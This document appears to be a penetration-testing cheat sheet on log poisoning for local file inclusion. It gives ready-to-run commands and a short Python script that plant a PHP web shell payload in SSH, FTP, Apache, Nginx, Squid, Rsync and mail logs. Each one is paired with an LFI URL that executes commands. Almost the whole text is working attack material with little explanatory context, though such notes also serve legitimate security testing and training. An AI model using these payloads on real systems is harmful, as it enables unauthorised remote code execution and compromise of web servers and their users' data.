Services

SSH

ssh '<?php system($_GET["cmd"]); ?>'@192.168.1.2                                                                           
http://192.168.1.2/file.php?file=/var/log/auth.log&cmd=id                                   

ERROR (remote username contains invalid characters)

Metasploit
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME <?php system($_GET["cmd"]); ?>
msf6 auxiliary(scanner/ssh/ssh_login) > set PASSWORD blahblah
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.2 #<IPv4/IPv6>
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 192.168.1.2:22 - Starting bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Python
#!/usr/bin/env python3
# encoding: utf-8

import paramiko

def run():
    host = '192.168.1.2' # IPv4/IPv6
    username = '<?php system($_GET["cmd"]); ?>'
    password = 'blahblah'

    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        ssh.connect(
            host,
            username=username,
            password=password,
            timeout=5,
            auth_timeout=5
        )
    except paramiko.AuthenticationException:
        print("Auth failed")
    except paramiko.SSHException as e:
        print("Error SSH:", e)
    except Exception as e:
        print("Error general:", e)
    finally:
        ssh.close()

run()

FTP

lftp -u '<?php system($_GET["cmd"]); ?>', 192.168.1.2
http://192.168.1.2/file.php?file=/var/log/vsftpd.log&cmd=id

HTTP (User-Agent)

Apache2

Linux
# User-Agent: <?php system($_GET['cmd']); ?>
curl -s -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://192.168.1.2"
http://192.168.1.2/file.php?file=/var/log/apache2/access.log&cmd=id
Windows
XAMPP
# User-Agent: <?php system($_GET['cmd']); ?>
curl -s -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://192.168.1.2"
http://192.168.1.2/file.php?file=c:\xampp\apache\logs\access.log

Nginx

# User-Agent: <?php system($_GET['cmd']); ?>
curl -s -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://192.168.1.2"
http://192.168.1.2/file.php?file=/var/log/nginx/access.log&cmd=id

Squid

# User-Agent: <?php system($_GET['cmd']); ?>
curl -sX GET --proxy "http://192.168.1.2:3128" "http://127.0.0.1:80" -A '<?php system($_GET["cmd"]); ?>'
http://192.168.1.2/file.php?file=/var/log/squid/access.log&cmd=id

Rsync

rsync 192.168.1.2::'<?php system($_GET["cmd"]); ?>'
http://192.168.1.2/file.php?file=/var/log/rsyncd.log&cmd=id

SMTP

Mail Poisoning

 telnet 192.168.1.95 25
VRFY cain
MAIL FROM: cain
RCPT TO: abel
DATA
Subject: LOG POISONING
<?php system($_GET['cmd']); ?>
.
QUIT
http://192.168.1.2/emailreader.php?id=/var/mail/cain&cmd=id